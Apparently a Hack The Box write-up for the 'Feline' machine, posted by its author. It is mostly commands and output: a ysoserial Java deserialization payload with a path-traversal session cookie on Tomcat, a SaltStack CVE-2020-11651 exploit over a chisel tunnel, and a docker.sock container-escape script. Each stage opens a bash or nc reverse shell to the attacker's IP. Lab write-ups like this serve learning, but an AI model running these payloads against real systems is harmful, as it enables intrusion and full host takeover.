NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-04 12:13 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:14
Completed NSE at 12:14, 0.00s elapsed
Initiating NSE at 12:14
Completed NSE at 12:14, 0.00s elapsed
Initiating NSE at 12:14
Completed NSE at 12:14, 0.00s elapsed
Initiating Ping Scan at 12:14
Scanning 10.10.10.205 [4 ports]
Completed Ping Scan at 12:14, 0.56s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:14
Scanning feline.htb (10.10.10.205) [1000 ports]
Discovered open port 8080/tcp on 10.10.10.205
Discovered open port 22/tcp on 10.10.10.205
Completed SYN Stealth Scan at 12:14, 3.61s elapsed (1000 total ports)
Initiating Service scan at 12:14
Scanning 2 services on feline.htb (10.10.10.205)
Completed Service scan at 12:14, 8.85s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against feline.htb (10.10.10.205)
Retrying OS detection (try #2) against feline.htb (10.10.10.205)
Retrying OS detection (try #3) against feline.htb (10.10.10.205)
Retrying OS detection (try #4) against feline.htb (10.10.10.205)
Retrying OS detection (try #5) against feline.htb (10.10.10.205)
Initiating Traceroute at 12:14
Completed Traceroute at 12:14, 0.48s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 12:14
Completed Parallel DNS resolution of 2 hosts. at 12:14, 0.41s elapsed
NSE: Script scanning 10.10.10.205.
Initiating NSE at 12:14
Completed NSE at 12:14, 11.08s elapsed
Initiating NSE at 12:14
Completed NSE at 12:14, 1.22s elapsed
Initiating NSE at 12:14
Completed NSE at 12:14, 0.00s elapsed
Nmap scan report for feline.htb (10.10.10.205)
Host is up (0.30s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
8080/tcp open http Apache Tomcat 9.0.27
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: VirusBucket
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=9/4%OT=22%CT=1%CU=41377%PV=Y%DS=2%DC=T%G=Y%TM=5F51E25D
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)OPS(O
OS:1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11N
OS:W7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R
OS:=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y
OS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R
OS:%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=
OS:40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S
OS:)
Uptime guess: 22.689 days (since Wed Aug 12 19:42:43 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=253 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 1720/tcp)
HOP RTT ADDRESS
1 474.94 ms 10.10.14.1
2 475.12 ms feline.htb (10.10.10.205)
NSE: Script Post-scanning.
Initiating NSE at 12:14
Completed NSE at 12:14, 0.00s elapsed
Initiating NSE at 12:14
Completed NSE at 12:14, 0.00s elapsed
Initiating NSE at 12:14
Completed NSE at 12:14, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.52 seconds
Raw packets sent: 1159 (55.038KB) | Rcvd: 1121 (48.462KB)
PORT 8080
HOME PAGE
SERVICE PAGE
Now Here we can upload files so lets get this through burp
Here we will see that file can easily be uploaded but main thing is its destination so try hit and trial where I just removed the filename to see whats will happen if we do that and we will get output like this
As Now here we know the upload directory and we know that our webpage is tomcat one which we need to exploit that for that i got variuos websites from where we can take help
As of now we will be using java Deserialization attack for our tomcat to trigger the uploaded file but before that we will need to upload that to webpage with session extension as JSESSION COOKIE wil be triggering only session exntended files
So links from where you can read about this and clone repos are
https://medium.com/swlh/hacking-java-deserialization-7625c8450334
Now here we also need to download ysoserial jar file so for that link is
https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
Now just get all these files and read out and then we will be using these commands
USER ACCESS
First lets make a java exploit command part with session extension
First create a command script to be executed
echo “bash -i >& /dev/tcp/10.10.14.167/9002 0>&1” | base64
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNjcvOTAwMiAwPiYxCg==}|{base64,-d}|{bash,-i}
In above 2 commands we have used base64 part to execute these scripts as through base64 we will not need to face errors for symbols and space in reverse shell commands so thats we have used base64 secondly it is the only way for java Deserialization attack
Secondly to create a file with session extension
java -jar ysoserial-master-6eca5bc740-1.jar CommonsCollections2 “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNjcvOTAwMiAwPiYxCg==}|{base64,-d}|{bash,-i}” > liquidrage.session
Here it will generate a session file using ysoserial jar file which is used to create payloads for that
Now just upload that session file through webpage
and then we will be triggering that to get our shell
So after uploading your file run this command
curl -sS ‘http://feline.htb:8080/upload.jsp’ -H “Cookie:JSESSIONID=../../../opt/samples/uploads/liquidrage” > /dev/null
My reverse shell
┌─[root@liquid]─[~/Desktop/HTB/feline] └──╼ #nc -lnvp 9002 listening on [any] 9002 ... connect to [10.10.14.167] from (UNKNOWN) [10.10.10.205] 48714 bash: cannot set terminal process group (932): Inappropriate ioctl for device bash: no job control in this shell tomcat@VirusBucket:/opt/tomcat$ id id uid=1000(tomcat) gid=1000(tomcat) groups=1000(tomcat) tomcat@VirusBucket:/opt/tomcat$ cd cd tomcat@VirusBucket:~$ cat user.txt cat user.txt f50498c09383bb0c245da7098ebc5d3a tomcat@VirusBucket:~$
Now here we got USER ACCESS
ROOT ACCESS
Lets check all the ports available right now
tomcat@VirusBucket:~$ netstat -ltn netstat -ltn Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 127.0.0.1:36533 0.0.0.0:* LISTEN tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN tcp 0 0 127.0.0.1:4505 0.0.0.0:* LISTEN tcp 0 0 127.0.0.1:4506 0.0.0.0:* LISTEN tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN tcp6 0 0 127.0.0.1:8005 :::* LISTEN tcp6 0 0 :::8080 :::* LISTEN tcp6 0 0 :::22 :::* LISTEN tomcat@VirusBucket:~$
Now we all know that port 4505 4506 are saltstack ones
Lets get its exploit on google
Here we got exploit but we cannot use it in this shell as we need to import some modules which we cannot do their
So as usual lets get chisel out and forward this to our machine
To download and install chisel follow me along
Command to run to get chisel executable
cd chisel
go build
Now you will have chisel but its large file so to decrease the size of file
┌─[✗]─[root@liquid]─[~/Desktop/HTB/feline/chisel]
└──╼ #go build -ldflags="-s -w"
┌─[root@liquid]─[~/Desktop/HTB/feline/chisel]
└──╼ #upx build chisel
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2020
UPX 3.96 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 23rd 2020
File size Ratio Format Name
-------------------- ------ ----------- -----------
upx: build: FileNotFoundException: build: No such file or directory
9555968 -> 3833252 40.11% linux/amd64 chisel
Packed 1 file.
┌─[✗]─[root@liquid]─[~/Desktop/HTB/feline/chisel]
└──╼ #du -hs chisel
3.7M chisel
Now just transfer the file and get server up for port forward
tomcat@VirusBucket:/tmp$ chmod +x chisel chmod +x chisel tomcat@VirusBucket:/tmp$ ./chisel client 10.10.14.167:9004 R:4506:127.0.0.1:4506 <isel client 10.10.14.167:9004 R:4506:127.0.0.1:4506 2020/09/04 05:33:52 client: Connecting to ws://10.10.14.167:9004 2020/09/04 05:33:54 client: Fingerprint 76:85:e6:4d:bb:72:b8:a9:cd:ef:07:b0:51:3a:be:01 2020/09/04 05:33:55 client: Connected (Latency 414.88223ms)
chisel server response
┌─[✗]─[root@liquid]─[~/Desktop/HTB/feline/chisel] └──╼ #./chisel server -p 9004 --reverse 2020/09/04 10:57:19 server: Reverse tunnelling enabled 2020/09/04 10:57:19 server: Fingerprint 76:85:e6:4d:bb:72:b8:a9:cd:ef:07:b0:51:3a:be:01 2020/09/04 10:57:19 server: Listening on http://0.0.0.0:9004 2020/09/04 10:57:23 server: session#1: tun: proxy#R:4506=>4506: Listening
now lets run that script right away
Now to run that we need to import salt module
pip3 install salt
now lets get shell as mentioned in POC
┌─[root@liquid]─[~/Desktop/HTB/feline/chisel/CVE-2020-11651-poc] └──╼ #python3 exploit.py --master 127.0.0.1 --exec "nc 127.0.0.1 9005 -e /bin/sh" [!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort. [+] Checking salt-master (127.0.0.1:4506) status... ONLINE [+] Checking if vulnerable to CVE-2020-11651... YES [*] root key obtained: NdhkLm4xlo/nfaw+mtVJsuY+SqyJwGWaLx8189/vjbwRfNLUwCce5YFnJGcZsg9AaJuVCvZiBPQ= [+] Attemping to execute nc 127.0.0.1 9005 -e /bin/sh on 127.0.0.1 [+] Successfully scheduled job: 20200904055046865589 ┌─[root@liquid]─[~/Desktop/HTB/feline/chisel/CVE-2020-11651-poc] └──╼ #python3 exploit.py --master 127.0.0.1 --exec 'bash -c "bash -i >& /dev/tcp/10.10.14.167/9005 0>&1"' [!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort. [+] Checking salt-master (127.0.0.1:4506) status... ONLINE [+] Checking if vulnerable to CVE-2020-11651... YES [*] root key obtained: NdhkLm4xlo/nfaw+mtVJsuY+SqyJwGWaLx8189/vjbwRfNLUwCce5YFnJGcZsg9AaJuVCvZiBPQ= [+] Attemping to execute bash -c "bash -i >& /dev/tcp/10.10.14.167/9005 0>&1" on 127.0.0.1 [+] Successfully scheduled job: 20200904055201158560
Here above i tried nc which didn’t work but bash rev shell worked perfectly
My Reverse shell
┌─[root@liquid]─[~/Desktop/HTB/feline/chisel/CVE-2020-11651-poc] └──╼ #nc -lnvp 9005 listening on [any] 9005 ... connect to [10.10.14.167] from (UNKNOWN) [10.10.10.205] 49746 bash: cannot set terminal process group (2095): Inappropriate ioctl for device bash: no job control in this shell root@2d24bf61767c:~#
But here we are in docker
Now Here in bash history we are given docker.sock which is odd and this docker is running SSH server
So here we will be creating a new docker image and mounting all data from previous one to here including root files
So to do that i have a script which i had to take and understand from my friend
#!/bin/bash
pay="bash -c 'bash -i >& /dev/tcp/10.10.14.167/9007 0>&1'"
payload="[\"/bin/sh\",\"-c\",\"chroot /mnt sh -c \\\"$pay\\\"\"]"
response=$(curl -s -XPOST --unix-socket /var/run/docker.sock -d "{\"Image\":\"sandbox\",\"cmd\":$payload, \"Binds\": [\"/:/mnt:rw\"]}" -H 'Content-Type: application/json' http://localhost/containers/create)
revShellContainerID=$(echo "$response" | cut -d'"' -f4)
curl -s -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/$revShellContainerID/start
sleep 1
curl --output - -s --unix-socket /var/run/docker.sock "http://localhost/containers/$revShellContainerID/logs?stderr=1&stdout=1"
Just transfer this script to that machine and open up you nc server and run this script
┌─[✗]─[root@liquid]─[~/Desktop/HTB/feline/chisel] └──╼ #ssh root@127.0.0.1 -i id_rsa Linux 2d24bf61767c 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Fri Sep 4 06:07:04 2020 from 127.0.0.1 root@2d24bf61767c:~# wget http://10.10.14.167/exploit.sh --2020-09-04 06:15:01-- http://10.10.14.167/exploit.sh Connecting to 10.10.14.167:80... connected. HTTP request sent, awaiting response... 200 OK Length: 641 [text/x-sh] Saving to: 'exploit.sh' exploit.sh 100%[============================================================>] 641 --.-KB/s in 0s 2020-09-04 06:15:02 (45.0 MB/s) - 'exploit.sh' saved [641/641] root@2d24bf61767c:~# chmod +x exploit.sh root@2d24bf61767c:~# ./exploit.sh root@2d24bf61767c:~#
My Reverse Shell
┌─[root@liquid]─[~/Desktop/HTB/feline/chisel] └──╼ #nc -lnvp 9007 listening on [any] 9007 ... connect to [10.10.14.167] from (UNKNOWN) [10.10.10.205] 41764 bash: cannot set terminal process group (1): Inappropriate ioctl for device bash: no job control in this shell groups: cannot find name for group ID 11 To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details. root@1dfbcd626cdb:/cd ls cd root@1dfbcd626cdb:~# ls root.txt snap root@1dfbcd626cdb:~# cat ro cat root.txt 2452ed5c64fdb7bf31ab09bf7a9b9140 root@1dfbcd626cdb:~#
Here we go with our root flag
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
